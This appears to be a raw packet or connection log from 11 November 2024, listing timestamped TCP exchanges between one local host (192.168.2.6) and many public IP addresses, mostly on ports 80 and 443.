Nov 11, 2024 18:14:53.555145979 CET	64574	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:14:53.555160046 CET	443	64574	188.114.97.3	192.168.2.6
Nov 11, 2024 18:14:53.668047905 CET	80	64570	18.208.156.248	192.168.2.6
Nov 11, 2024 18:14:53.668071985 CET	80	64568	44.221.84.105	192.168.2.6
Nov 11, 2024 18:14:53.668106079 CET	80	64567	199.59.243.227	192.168.2.6
Nov 11, 2024 18:14:53.668118954 CET	80	64569	3.94.10.34	192.168.2.6
Nov 11, 2024 18:14:53.668193102 CET	64570	80	192.168.2.6	18.208.156.248
Nov 11, 2024 18:14:53.668193102 CET	64568	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:14:53.668204069 CET	64569	80	192.168.2.6	3.94.10.34
Nov 11, 2024 18:14:53.668245077 CET	64567	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:14:53.668462038 CET	80	64563	208.100.26.245	192.168.2.6
Nov 11, 2024 18:14:53.668584108 CET	80	64572	91.195.240.19	192.168.2.6
Nov 11, 2024 18:14:53.668596983 CET	80	64572	91.195.240.19	192.168.2.6
Nov 11, 2024 18:14:53.668608904 CET	80	64572	91.195.240.19	192.168.2.6
Nov 11, 2024 18:14:53.668621063 CET	80	64572	91.195.240.19	192.168.2.6
Nov 11, 2024 18:14:53.668633938 CET	80	64572	91.195.240.19	192.168.2.6
Nov 11, 2024 18:14:53.668644905 CET	80	64572	91.195.240.19	192.168.2.6
Nov 11, 2024 18:14:53.668658972 CET	64563	80	192.168.2.6	208.100.26.245
Nov 11, 2024 18:14:53.668663979 CET	80	64572	91.195.240.19	192.168.2.6
Nov 11, 2024 18:14:53.668670893 CET	64572	80	192.168.2.6	91.195.240.19
Nov 11, 2024 18:14:53.668677092 CET	80	64572	91.195.240.19	192.168.2.6
Nov 11, 2024 18:14:53.668689966 CET	80	64572	91.195.240.19	192.168.2.6
Nov 11, 2024 18:14:53.668694973 CET	64572	80	192.168.2.6	91.195.240.19
Nov 11, 2024 18:14:53.668709993 CET	64572	80	192.168.2.6	91.195.240.19
Nov 11, 2024 18:14:53.668751001 CET	80	64572	91.195.240.19	192.168.2.6
Nov 11, 2024 18:14:53.668751001 CET	443	64573	75.2.71.199	192.168.2.6
Nov 11, 2024 18:14:53.668762922 CET	80	64572	91.195.240.19	192.168.2.6
Nov 11, 2024 18:14:53.668782949 CET	64572	80	192.168.2.6	91.195.240.19
Nov 11, 2024 18:14:53.668816090 CET	64573	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:14:53.668816090 CET	64572	80	192.168.2.6	91.195.240.19
Nov 11, 2024 18:14:53.671667099 CET	80	64568	44.221.84.105	192.168.2.6
Nov 11, 2024 18:14:53.671679020 CET	80	64565	44.221.84.105	192.168.2.6
Nov 11, 2024 18:14:53.671689034 CET	80	64570	18.208.156.248	192.168.2.6
Nov 11, 2024 18:14:53.671705961 CET	80	64569	3.94.10.34	192.168.2.6
Nov 11, 2024 18:14:53.674074888 CET	80	64572	91.195.240.19	192.168.2.6
Nov 11, 2024 18:14:53.674179077 CET	80	64572	91.195.240.19	192.168.2.6
Nov 11, 2024 18:14:53.674190044 CET	80	64572	91.195.240.19	192.168.2.6
Nov 11, 2024 18:14:53.674201965 CET	80	64572	91.195.240.19	192.168.2.6
Nov 11, 2024 18:14:53.674213886 CET	80	64572	91.195.240.19	192.168.2.6
Nov 11, 2024 18:14:53.674226999 CET	80	64572	91.195.240.19	192.168.2.6
Nov 11, 2024 18:14:53.674235106 CET	64572	80	192.168.2.6	91.195.240.19
Nov 11, 2024 18:14:53.674238920 CET	80	64572	91.195.240.19	192.168.2.6
Nov 11, 2024 18:14:53.674252987 CET	80	64572	91.195.240.19	192.168.2.6
Nov 11, 2024 18:14:53.674299955 CET	64572	80	192.168.2.6	91.195.240.19
Nov 11, 2024 18:14:53.674299955 CET	64572	80	192.168.2.6	91.195.240.19
Nov 11, 2024 18:14:53.675144911 CET	80	64572	91.195.240.19	192.168.2.6
Nov 11, 2024 18:14:53.675158024 CET	80	64572	91.195.240.19	192.168.2.6
Nov 11, 2024 18:14:53.675169945 CET	80	64572	91.195.240.19	192.168.2.6
Nov 11, 2024 18:14:53.679886103 CET	64572	80	192.168.2.6	91.195.240.19
Nov 11, 2024 18:14:53.706125021 CET	80	64566	154.212.231.82	192.168.2.6
Nov 11, 2024 18:14:53.706697941 CET	64566	80	192.168.2.6	154.212.231.82
Nov 11, 2024 18:14:53.731106043 CET	64573	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:14:53.731126070 CET	443	64573	75.2.71.199	192.168.2.6
Nov 11, 2024 18:14:53.734622002 CET	64566	80	192.168.2.6	154.212.231.82
Nov 11, 2024 18:14:53.740376949 CET	80	64566	154.212.231.82	192.168.2.6
Nov 11, 2024 18:14:53.766673088 CET	64573	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:14:53.766685009 CET	443	64573	75.2.71.199	192.168.2.6
Nov 11, 2024 18:14:53.962136984 CET	443	64573	75.2.71.199	192.168.2.6
Nov 11, 2024 18:14:53.962312937 CET	64573	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:14:53.962966919 CET	443	64573	75.2.71.199	192.168.2.6
Nov 11, 2024 18:14:53.962990999 CET	443	64573	75.2.71.199	192.168.2.6
Nov 11, 2024 18:14:53.963042021 CET	64573	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:14:53.963047028 CET	443	64573	75.2.71.199	192.168.2.6
Nov 11, 2024 18:14:53.963398933 CET	64573	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:14:53.963598967 CET	443	64573	75.2.71.199	192.168.2.6
Nov 11, 2024 18:14:53.963654995 CET	64573	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:14:54.044380903 CET	443	64573	75.2.71.199	192.168.2.6
Nov 11, 2024 18:14:54.044527054 CET	64573	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:14:54.044724941 CET	443	64573	75.2.71.199	192.168.2.6
Nov 11, 2024 18:14:54.044873953 CET	64573	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:14:54.045708895 CET	443	64573	75.2.71.199	192.168.2.6
Nov 11, 2024 18:14:54.045717955 CET	443	64573	75.2.71.199	192.168.2.6
Nov 11, 2024 18:14:54.045747995 CET	443	64573	75.2.71.199	192.168.2.6
Nov 11, 2024 18:14:54.045770884 CET	64573	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:14:54.045777082 CET	443	64573	75.2.71.199	192.168.2.6
Nov 11, 2024 18:14:54.045825958 CET	64573	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:14:54.045825958 CET	64573	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:14:54.046662092 CET	443	64573	75.2.71.199	192.168.2.6
Nov 11, 2024 18:14:54.046740055 CET	64573	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:14:54.046740055 CET	64573	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:14:54.078891993 CET	80	64566	154.212.231.82	192.168.2.6
Nov 11, 2024 18:14:54.081011057 CET	64566	80	192.168.2.6	154.212.231.82
Nov 11, 2024 18:14:54.096024990 CET	443	64574	188.114.97.3	192.168.2.6
Nov 11, 2024 18:14:54.096134901 CET	64574	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:14:54.125252962 CET	443	64573	75.2.71.199	192.168.2.6
Nov 11, 2024 18:14:54.125299931 CET	443	64573	75.2.71.199	192.168.2.6
Nov 11, 2024 18:14:54.125396967 CET	64573	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:14:54.125396967 CET	64573	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:14:54.125402927 CET	443	64573	75.2.71.199	192.168.2.6
Nov 11, 2024 18:14:54.126074076 CET	443	64573	75.2.71.199	192.168.2.6
Nov 11, 2024 18:14:54.126108885 CET	443	64573	75.2.71.199	192.168.2.6
Nov 11, 2024 18:14:54.126132011 CET	64573	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:14:54.126136065 CET	443	64573	75.2.71.199	192.168.2.6
Nov 11, 2024 18:14:54.126159906 CET	64573	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:14:54.126177073 CET	443	64573	75.2.71.199	192.168.2.6
Nov 11, 2024 18:14:54.126197100 CET	64573	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:14:54.127614021 CET	64573	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:14:54.170550108 CET	64573	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:14:54.170572996 CET	443	64573	75.2.71.199	192.168.2.6
Nov 11, 2024 18:14:54.170718908 CET	64574	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:14:54.170737982 CET	443	64574	188.114.97.3	192.168.2.6
Nov 11, 2024 18:14:54.171051025 CET	443	64574	188.114.97.3	192.168.2.6
Nov 11, 2024 18:14:54.171147108 CET	64574	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:14:54.172694921 CET	64574	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:14:54.215322971 CET	443	64574	188.114.97.3	192.168.2.6
Nov 11, 2024 18:14:54.970122099 CET	63478	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:14:54.970146894 CET	63492	80	192.168.2.6	64.190.63.136
Nov 11, 2024 18:14:55.015415907 CET	80	64571	199.191.50.83	192.168.2.6
Nov 11, 2024 18:14:55.015430927 CET	80	64571	199.191.50.83	192.168.2.6
Nov 11, 2024 18:14:55.015444040 CET	80	64571	199.191.50.83	192.168.2.6
Nov 11, 2024 18:14:55.015456915 CET	80	64571	199.191.50.83	192.168.2.6
Nov 11, 2024 18:14:55.015467882 CET	80	64571	199.191.50.83	192.168.2.6
Nov 11, 2024 18:14:55.015480995 CET	80	64571	199.191.50.83	192.168.2.6
Nov 11, 2024 18:14:55.015480995 CET	64571	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:14:55.015513897 CET	64571	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:14:55.015551090 CET	64571	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:14:55.015594959 CET	80	64571	199.191.50.83	192.168.2.6
Nov 11, 2024 18:14:55.015615940 CET	80	64571	199.191.50.83	192.168.2.6
Nov 11, 2024 18:14:55.015630960 CET	80	64571	199.191.50.83	192.168.2.6
Nov 11, 2024 18:14:55.015636921 CET	64571	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:14:55.015641928 CET	80	64571	199.191.50.83	192.168.2.6
Nov 11, 2024 18:14:55.015655994 CET	64571	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:14:55.015674114 CET	64571	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:14:55.015693903 CET	64571	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:14:55.020559072 CET	80	64571	199.191.50.83	192.168.2.6
Nov 11, 2024 18:14:55.020574093 CET	80	64571	199.191.50.83	192.168.2.6
Nov 11, 2024 18:14:55.020607948 CET	64571	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:14:55.020612955 CET	80	64571	199.191.50.83	192.168.2.6
Nov 11, 2024 18:14:55.020622969 CET	64571	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:14:55.020625114 CET	80	64571	199.191.50.83	192.168.2.6
Nov 11, 2024 18:14:55.020637035 CET	80	64571	199.191.50.83	192.168.2.6
Nov 11, 2024 18:14:55.020647049 CET	64571	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:14:55.020667076 CET	64571	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:14:55.020678997 CET	64571	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:14:55.048971891 CET	443	64574	188.114.97.3	192.168.2.6
Nov 11, 2024 18:14:55.049024105 CET	64574	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:14:55.049029112 CET	443	64574	188.114.97.3	192.168.2.6
Nov 11, 2024 18:14:55.049046993 CET	443	64574	188.114.97.3	192.168.2.6
Nov 11, 2024 18:14:55.049067974 CET	64574	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:14:55.049077034 CET	443	64574	188.114.97.3	192.168.2.6
Nov 11, 2024 18:14:55.049109936 CET	443	64574	188.114.97.3	192.168.2.6
Nov 11, 2024 18:14:55.049118996 CET	64574	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:14:55.049124002 CET	443	64574	188.114.97.3	192.168.2.6
Nov 11, 2024 18:14:55.049149036 CET	64574	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:14:55.049169064 CET	443	64574	188.114.97.3	192.168.2.6
Nov 11, 2024 18:14:55.049169064 CET	64574	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:14:55.049179077 CET	443	64574	188.114.97.3	192.168.2.6
Nov 11, 2024 18:14:55.049211025 CET	64574	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:14:55.049221039 CET	443	64574	188.114.97.3	192.168.2.6
Nov 11, 2024 18:14:55.049257040 CET	64574	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:14:55.049568892 CET	443	64574	188.114.97.3	192.168.2.6
Nov 11, 2024 18:14:55.049570084 CET	64574	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:14:55.049622059 CET	64574	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:14:55.051901102 CET	64562	80	192.168.2.6	188.114.97.3
Nov 11, 2024 18:14:55.052439928 CET	64575	80	192.168.2.6	188.114.97.3
Nov 11, 2024 18:14:55.057256937 CET	80	64575	188.114.97.3	192.168.2.6
Nov 11, 2024 18:14:55.057324886 CET	64575	80	192.168.2.6	188.114.97.3
Nov 11, 2024 18:14:55.057564974 CET	64575	80	192.168.2.6	188.114.97.3
Nov 11, 2024 18:14:55.057616949 CET	80	64562	188.114.97.3	192.168.2.6
Nov 11, 2024 18:14:55.057673931 CET	64562	80	192.168.2.6	188.114.97.3
Nov 11, 2024 18:14:55.062465906 CET	80	64575	188.114.97.3	192.168.2.6
Nov 11, 2024 18:14:55.075900078 CET	58877	80	192.168.2.6	103.150.10.48
Nov 11, 2024 18:14:55.095130920 CET	63298	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:14:55.096333027 CET	80	64571	199.191.50.83	192.168.2.6
Nov 11, 2024 18:14:55.096357107 CET	80	64571	199.191.50.83	192.168.2.6
Nov 11, 2024 18:14:55.096384048 CET	80	64571	199.191.50.83	192.168.2.6
Nov 11, 2024 18:14:55.096395969 CET	80	64571	199.191.50.83	192.168.2.6
Nov 11, 2024 18:14:55.096393108 CET	64571	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:14:55.096410036 CET	80	64571	199.191.50.83	192.168.2.6
Nov 11, 2024 18:14:55.096432924 CET	64571	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:14:55.096432924 CET	64571	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:14:55.096471071 CET	64571	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:14:55.096709967 CET	80	64571	199.191.50.83	192.168.2.6
Nov 11, 2024 18:14:55.096738100 CET	80	64571	199.191.50.83	192.168.2.6
Nov 11, 2024 18:14:55.096746922 CET	64571	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:14:55.096750975 CET	80	64571	199.191.50.83	192.168.2.6
Nov 11, 2024 18:14:55.096776962 CET	64571	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:14:55.096795082 CET	64571	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:14:55.096812963 CET	80	64571	199.191.50.83	192.168.2.6
Nov 11, 2024 18:14:55.096826077 CET	80	64571	199.191.50.83	192.168.2.6
Nov 11, 2024 18:14:55.096858978 CET	64571	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:14:55.096924067 CET	64571	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:14:55.097619057 CET	80	64571	199.191.50.83	192.168.2.6
Nov 11, 2024 18:14:55.097630978 CET	80	64571	199.191.50.83	192.168.2.6
Nov 11, 2024 18:14:55.097641945 CET	80	64571	199.191.50.83	192.168.2.6
Nov 11, 2024 18:14:55.097654104 CET	80	64571	199.191.50.83	192.168.2.6
Nov 11, 2024 18:14:55.097666979 CET	64571	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:14:55.097666979 CET	80	64571	199.191.50.83	192.168.2.6
Nov 11, 2024 18:14:55.097681999 CET	64571	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:14:55.097723961 CET	64571	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:14:55.098301888 CET	80	64571	199.191.50.83	192.168.2.6
Nov 11, 2024 18:14:55.098345995 CET	64571	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:14:55.098354101 CET	80	64571	199.191.50.83	192.168.2.6
Nov 11, 2024 18:14:55.098381042 CET	80	64571	199.191.50.83	192.168.2.6
Nov 11, 2024 18:14:55.098397970 CET	64571	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:14:55.098398924 CET	80	64571	199.191.50.83	192.168.2.6
Nov 11, 2024 18:14:55.098411083 CET	80	64571	199.191.50.83	192.168.2.6
Nov 11, 2024 18:14:55.098417997 CET	64571	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:14:55.098439932 CET	64571	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:14:55.098450899 CET	64571	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:14:55.099179983 CET	80	64571	199.191.50.83	192.168.2.6
Nov 11, 2024 18:14:55.099191904 CET	80	64571	199.191.50.83	192.168.2.6
Nov 11, 2024 18:14:55.099204063 CET	80	64571	199.191.50.83	192.168.2.6
Nov 11, 2024 18:14:55.099215984 CET	80	64571	199.191.50.83	192.168.2.6
Nov 11, 2024 18:14:55.099221945 CET	64571	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:14:55.099235058 CET	64571	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:14:55.099266052 CET	64571	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:14:55.177606106 CET	80	64571	199.191.50.83	192.168.2.6
Nov 11, 2024 18:14:55.177623987 CET	80	64571	199.191.50.83	192.168.2.6
Nov 11, 2024 18:14:55.177635908 CET	80	64571	199.191.50.83	192.168.2.6
Nov 11, 2024 18:14:55.177658081 CET	64571	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:14:55.177685022 CET	64571	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:14:55.486042976 CET	64572	80	192.168.2.6	91.195.240.19
Nov 11, 2024 18:14:55.486157894 CET	64571	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:14:55.486264944 CET	64560	80	192.168.2.6	162.255.119.102
Nov 11, 2024 18:14:55.486268044 CET	64567	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:14:55.486267090 CET	64566	80	192.168.2.6	154.212.231.82
Nov 11, 2024 18:14:55.486413956 CET	64563	80	192.168.2.6	208.100.26.245
Nov 11, 2024 18:14:55.488394976 CET	64561	80	192.168.2.6	5.79.71.205
Nov 11, 2024 18:14:55.488590002 CET	64575	80	192.168.2.6	188.114.97.3
Nov 11, 2024 18:14:55.491565943 CET	80	64572	91.195.240.19	192.168.2.6
Nov 11, 2024 18:14:55.493103027 CET	80	64571	199.191.50.83	192.168.2.6
Nov 11, 2024 18:14:55.493159056 CET	80	64560	162.255.119.102	192.168.2.6
Nov 11, 2024 18:14:55.493223906 CET	80	64567	199.59.243.227	192.168.2.6
Nov 11, 2024 18:14:55.493240118 CET	80	64566	154.212.231.82	192.168.2.6
Nov 11, 2024 18:14:55.493262053 CET	64572	80	192.168.2.6	91.195.240.19
Nov 11, 2024 18:14:55.493263960 CET	64571	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:14:55.493263960 CET	64560	80	192.168.2.6	162.255.119.102
Nov 11, 2024 18:14:55.493326902 CET	80	64563	208.100.26.245	192.168.2.6
Nov 11, 2024 18:14:55.493350983 CET	64566	80	192.168.2.6	154.212.231.82
Nov 11, 2024 18:14:55.493354082 CET	64567	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:14:55.495505095 CET	64563	80	192.168.2.6	208.100.26.245
Nov 11, 2024 18:14:55.514688969 CET	64576	80	192.168.2.6	5.79.71.205
Nov 11, 2024 18:14:55.519630909 CET	80	64576	5.79.71.205	192.168.2.6
Nov 11, 2024 18:14:55.519795895 CET	64576	80	192.168.2.6	5.79.71.205
Nov 11, 2024 18:14:55.542689085 CET	64576	80	192.168.2.6	5.79.71.205
Nov 11, 2024 18:14:55.547859907 CET	80	64576	5.79.71.205	192.168.2.6
Nov 11, 2024 18:14:59.550792933 CET	64576	80	192.168.2.6	5.79.71.205
Nov 11, 2024 18:14:59.782761097 CET	63492	80	192.168.2.6	64.190.63.136
Nov 11, 2024 18:14:59.814805984 CET	63478	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:14:59.822644949 CET	64577	80	192.168.2.6	13.248.169.48
Nov 11, 2024 18:14:59.827636003 CET	80	64577	13.248.169.48	192.168.2.6
Nov 11, 2024 18:14:59.827755928 CET	64577	80	192.168.2.6	13.248.169.48
Nov 11, 2024 18:14:59.827982903 CET	64577	80	192.168.2.6	13.248.169.48
Nov 11, 2024 18:14:59.832745075 CET	80	64577	13.248.169.48	192.168.2.6
Nov 11, 2024 18:14:59.840818882 CET	64578	80	192.168.2.6	188.114.96.3
Nov 11, 2024 18:14:59.845825911 CET	80	64578	188.114.96.3	192.168.2.6
Nov 11, 2024 18:14:59.845983982 CET	64578	80	192.168.2.6	188.114.96.3
Nov 11, 2024 18:14:59.863230944 CET	64578	80	192.168.2.6	188.114.96.3
Nov 11, 2024 18:14:59.868225098 CET	80	64578	188.114.96.3	192.168.2.6
Nov 11, 2024 18:14:59.892273903 CET	58877	80	192.168.2.6	103.150.10.48
Nov 11, 2024 18:15:00.098804951 CET	63298	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:15:00.131119967 CET	64579	80	192.168.2.6	3.94.10.34
Nov 11, 2024 18:15:00.136169910 CET	80	64579	3.94.10.34	192.168.2.6
Nov 11, 2024 18:15:00.136334896 CET	64579	80	192.168.2.6	3.94.10.34
Nov 11, 2024 18:15:00.233278036 CET	64579	80	192.168.2.6	3.94.10.34
Nov 11, 2024 18:15:00.238270044 CET	80	64579	3.94.10.34	192.168.2.6
Nov 11, 2024 18:15:00.260653019 CET	80	64577	13.248.169.48	192.168.2.6
Nov 11, 2024 18:15:00.260759115 CET	64577	80	192.168.2.6	13.248.169.48
Nov 11, 2024 18:15:00.261042118 CET	64580	80	192.168.2.6	18.208.156.248
Nov 11, 2024 18:15:00.265937090 CET	80	64580	18.208.156.248	192.168.2.6
Nov 11, 2024 18:15:00.266916037 CET	64580	80	192.168.2.6	18.208.156.248
Nov 11, 2024 18:15:00.279036045 CET	64580	80	192.168.2.6	18.208.156.248
Nov 11, 2024 18:15:00.284116030 CET	80	64580	18.208.156.248	192.168.2.6
Nov 11, 2024 18:15:00.399111032 CET	64581	80	192.168.2.6	103.150.10.48
Nov 11, 2024 18:15:00.404134989 CET	80	64581	103.150.10.48	192.168.2.6
Nov 11, 2024 18:15:00.404314995 CET	64581	80	192.168.2.6	103.150.10.48
Nov 11, 2024 18:15:00.404441118 CET	64581	80	192.168.2.6	103.150.10.48
Nov 11, 2024 18:15:00.409300089 CET	80	64581	103.150.10.48	192.168.2.6
Nov 11, 2024 18:15:00.564445019 CET	80	64579	3.94.10.34	192.168.2.6
Nov 11, 2024 18:15:00.565021038 CET	64579	80	192.168.2.6	3.94.10.34
Nov 11, 2024 18:15:00.566035032 CET	64579	80	192.168.2.6	3.94.10.34
Nov 11, 2024 18:15:00.571240902 CET	80	64579	3.94.10.34	192.168.2.6
Nov 11, 2024 18:15:00.571294069 CET	64579	80	192.168.2.6	3.94.10.34
Nov 11, 2024 18:15:00.696957111 CET	80	64580	18.208.156.248	192.168.2.6
Nov 11, 2024 18:15:00.697014093 CET	64580	80	192.168.2.6	18.208.156.248
Nov 11, 2024 18:15:00.698810101 CET	64580	80	192.168.2.6	18.208.156.248
Nov 11, 2024 18:15:00.704184055 CET	80	64580	18.208.156.248	192.168.2.6
Nov 11, 2024 18:15:00.704199076 CET	80	64580	18.208.156.248	192.168.2.6
Nov 11, 2024 18:15:00.725749969 CET	80	64578	188.114.96.3	192.168.2.6
Nov 11, 2024 18:15:00.725807905 CET	64578	80	192.168.2.6	188.114.96.3
Nov 11, 2024 18:15:00.726519108 CET	80	64578	188.114.96.3	192.168.2.6
Nov 11, 2024 18:15:00.726581097 CET	64578	80	192.168.2.6	188.114.96.3
Nov 11, 2024 18:15:00.726629972 CET	80	64578	188.114.96.3	192.168.2.6
Nov 11, 2024 18:15:00.726669073 CET	64578	80	192.168.2.6	188.114.96.3
Nov 11, 2024 18:15:00.741336107 CET	64582	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:15:00.741374969 CET	443	64582	188.114.96.3	192.168.2.6
Nov 11, 2024 18:15:00.741434097 CET	64582	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:15:00.742096901 CET	64582	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:15:00.742109060 CET	443	64582	188.114.96.3	192.168.2.6
Nov 11, 2024 18:15:00.915081024 CET	80	64580	18.208.156.248	192.168.2.6
Nov 11, 2024 18:15:00.915199995 CET	64580	80	192.168.2.6	18.208.156.248
Nov 11, 2024 18:15:01.180039883 CET	443	64582	188.114.96.3	192.168.2.6
Nov 11, 2024 18:15:01.180111885 CET	64582	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:15:01.185329914 CET	80	64581	103.150.10.48	192.168.2.6
Nov 11, 2024 18:15:01.185431004 CET	64581	80	192.168.2.6	103.150.10.48
Nov 11, 2024 18:15:01.207465887 CET	64582	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:15:01.207492113 CET	443	64582	188.114.96.3	192.168.2.6
Nov 11, 2024 18:15:01.207838058 CET	443	64582	188.114.96.3	192.168.2.6
Nov 11, 2024 18:15:01.207930088 CET	64582	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:15:01.208794117 CET	64582	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:15:01.213167906 CET	64583	8000	192.168.2.6	106.15.232.163
Nov 11, 2024 18:15:01.218060970 CET	8000	64583	106.15.232.163	192.168.2.6
Nov 11, 2024 18:15:01.218130112 CET	64583	8000	192.168.2.6	106.15.232.163
Nov 11, 2024 18:15:01.218662977 CET	64583	8000	192.168.2.6	106.15.232.163
Nov 11, 2024 18:15:01.223506927 CET	8000	64583	106.15.232.163	192.168.2.6
Nov 11, 2024 18:15:01.251327038 CET	443	64582	188.114.96.3	192.168.2.6
Nov 11, 2024 18:15:02.010551929 CET	8000	64583	106.15.232.163	192.168.2.6
Nov 11, 2024 18:15:02.010691881 CET	64583	8000	192.168.2.6	106.15.232.163
Nov 11, 2024 18:15:02.012299061 CET	64584	80	192.168.2.6	103.150.10.48
Nov 11, 2024 18:15:02.012310028 CET	64581	80	192.168.2.6	103.150.10.48
Nov 11, 2024 18:15:02.017198086 CET	80	64584	103.150.10.48	192.168.2.6
Nov 11, 2024 18:15:02.017502069 CET	80	64581	103.150.10.48	192.168.2.6
Nov 11, 2024 18:15:02.017591953 CET	64584	80	192.168.2.6	103.150.10.48
Nov 11, 2024 18:15:02.017738104 CET	64581	80	192.168.2.6	103.150.10.48
Nov 11, 2024 18:15:02.018311977 CET	64584	80	192.168.2.6	103.150.10.48
Nov 11, 2024 18:15:02.023523092 CET	80	64584	103.150.10.48	192.168.2.6
Nov 11, 2024 18:15:03.583857059 CET	80	64584	103.150.10.48	192.168.2.6
Nov 11, 2024 18:15:03.584877968 CET	80	64584	103.150.10.48	192.168.2.6
Nov 11, 2024 18:15:03.585248947 CET	64584	80	192.168.2.6	103.150.10.48
Nov 11, 2024 18:15:03.585977077 CET	80	64584	103.150.10.48	192.168.2.6
Nov 11, 2024 18:15:03.588949919 CET	64584	80	192.168.2.6	103.150.10.48
Nov 11, 2024 18:15:04.331542015 CET	443	64582	188.114.96.3	192.168.2.6
Nov 11, 2024 18:15:04.331598043 CET	443	64582	188.114.96.3	192.168.2.6
Nov 11, 2024 18:15:04.331610918 CET	64582	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:15:04.331625938 CET	443	64582	188.114.96.3	192.168.2.6
Nov 11, 2024 18:15:04.331638098 CET	443	64582	188.114.96.3	192.168.2.6
Nov 11, 2024 18:15:04.331641912 CET	64582	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:15:04.331677914 CET	64582	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:15:04.331688881 CET	443	64582	188.114.96.3	192.168.2.6
Nov 11, 2024 18:15:04.331717968 CET	443	64582	188.114.96.3	192.168.2.6
Nov 11, 2024 18:15:04.331731081 CET	64582	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:15:04.331737041 CET	443	64582	188.114.96.3	192.168.2.6
Nov 11, 2024 18:15:04.331753969 CET	64582	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:15:04.331765890 CET	443	64582	188.114.96.3	192.168.2.6
Nov 11, 2024 18:15:04.331779003 CET	64582	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:15:04.331783056 CET	443	64582	188.114.96.3	192.168.2.6
Nov 11, 2024 18:15:04.331803083 CET	64582	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:15:04.331815958 CET	443	64582	188.114.96.3	192.168.2.6
Nov 11, 2024 18:15:04.331828117 CET	64582	443	192.168.2.6	188.114.96.3
